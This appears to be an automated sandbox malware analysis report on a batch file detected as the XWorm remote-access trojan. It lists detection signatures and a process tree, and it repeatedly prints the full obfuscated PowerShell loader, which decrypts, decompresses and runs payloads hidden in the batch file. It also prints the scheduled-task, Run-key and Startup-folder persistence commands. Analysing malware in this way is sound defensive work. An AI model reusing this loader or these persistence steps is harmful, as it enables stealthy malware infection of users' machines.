Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pollosappnuevo.bat

Overview

General Information

Sample name:Pollosappnuevo.bat
Analysis ID:1497356
MD5:536ac91b5fe6a53fd85f5d7b609dc591
SHA1:5fb565c1bec3e386642e921c34ea365fbcb07127
SHA256:ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected XWorm
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Powershell drops PE file
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pollosappnuevo.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • net.exe (PID: 7844 cmdline: net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • net1.exe (PID: 7868 cmdline: C:\Windows\system32\net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
    • powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 8092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 3168 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • cmd.exe (PID: 5692 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_616.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 1172 cmdline: net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 6320 cmdline: C:\Windows\system32\net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
          • powershell.exe (PID: 5264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9)
            • schtasks.exe (PID: 7812 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7336 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • e45iasd.exe (PID: 1528 cmdline: C:\Users\user\AppData\Local\Temp\e45iasd.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • e45iasd.exe (PID: 2524 cmdline: "C:\Users\user\AppData\Local\Temp\e45iasd.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • e45iasd.exe (PID: 4020 cmdline: "C:\Users\user\AppData\Local\Temp\e45iasd.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_7900.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
      amsi64_5264.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose();
        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\e45iasd.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e45iasd
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose();
        Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5264, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e45iasd.lnk
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7900, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , ProcessId: 3168, ProcessName: wscript.exe
        Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7900, TargetFilename: C:\Users\user\AppData\Roaming\startup_str_616.bat
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose();
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , ProcessId: 7336, ProcessName: wscript.exe
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose();
